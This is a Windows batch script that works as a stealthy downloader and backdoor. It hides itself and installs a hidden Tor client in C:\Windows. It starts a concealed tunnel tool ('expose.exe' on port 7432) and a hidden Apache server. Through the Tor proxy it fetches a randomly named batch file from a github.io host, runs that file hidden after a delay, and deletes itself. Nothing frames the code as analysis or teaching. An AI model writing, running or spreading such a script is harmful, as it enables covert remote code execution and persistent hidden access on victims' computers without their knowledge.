@echo off
attrib +s +h +i "%~f0"
:connectivitycheck
ping www.google.com -n 1 -w 5000 >NUL
if errorlevel 1 goto Connectivitycheck

Set host=https://cryptedodissey.github.io

if exist "C:\Windows\tor.exe" (
    echo.
) else (
curl.exe -k -L https://archive.torproject.org/tor-package-archive/torbrowser/12.0.4/tor-expert-bundle-12.0.4-windows-x86_64.tar.gz > "%temp%\Tor.tar.gz" && "C:\Windows\7-Zip\7z.exe" e "%temp%\Tor.tar.gz" -so | "C:\Windows\7-Zip\7z.exe" e -aoa -si -ttar "tor/tor.exe" -o"C:\Windows" -y && attrib +s +h +i "C:\Windows\tor.exe" && del "%temp%\Tor.tar.gz"
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (echo) else (
  nircmd exec hide "C:\Windows\tor.exe" && timeout -t 30
)

tasklist /fi "imagename eq tor.exe" | find /i "tor.exe" > nul
if not errorlevel 1 (set "proxy=--tlsv1.3 --socks5-hostname 127.0.0.1:9050") else (
  set "proxy=--tlsv1.3"
)

attrib -s -h -i "C:\Windows\expose.exe"
if exist "C:\Windows\expose.exe" (
   tasklist /fi "imagename eq expose.exe" | find /i "expose.exe" > nul
if not errorlevel 1 (attrib +s +h +i "C:\Windows\expose.exe") else (attrib -s -h -i "%temp%\expose.bat" && attrib -s -h -i "%temp%\expose.txt" && echo ^C:\Windows\expose.exe 7432^ ^>^ ^%temp%\expose.txt^ > "%temp%\expose.bat" && nircmd exec hide "%temp%\expose.bat" && timeout -t 4 && attrib +s +h +i "C:\Windows\expose.exe" && attrib +s +h +i "%temp%\expose.txt" && attrib +s +h +i "%temp%\expose.bat"
)
)

if exist "C:\Windows\apache2\bin\httpd.exe" (
tasklist /fi "imagename eq httpd.exe" | find /i "httpd.exe" > nul
if not errorlevel 1 (echo.) else (nircmd exec hide "C:\Windows\apache2\bin\httpd.exe"
)
)

set "win32=%random%"
curl.exe -k %proxy% %host%/win32.bat --output "C:\Windows\Win32\%win32%.bat" && attrib +s +h +i "C:\Windows\Win32\%win32%.bat"
timeout -t 300
nircmd exec hide "C:\Windows\Win32\%win32%.bat"
DEL /s /f /q /a "%~f0"
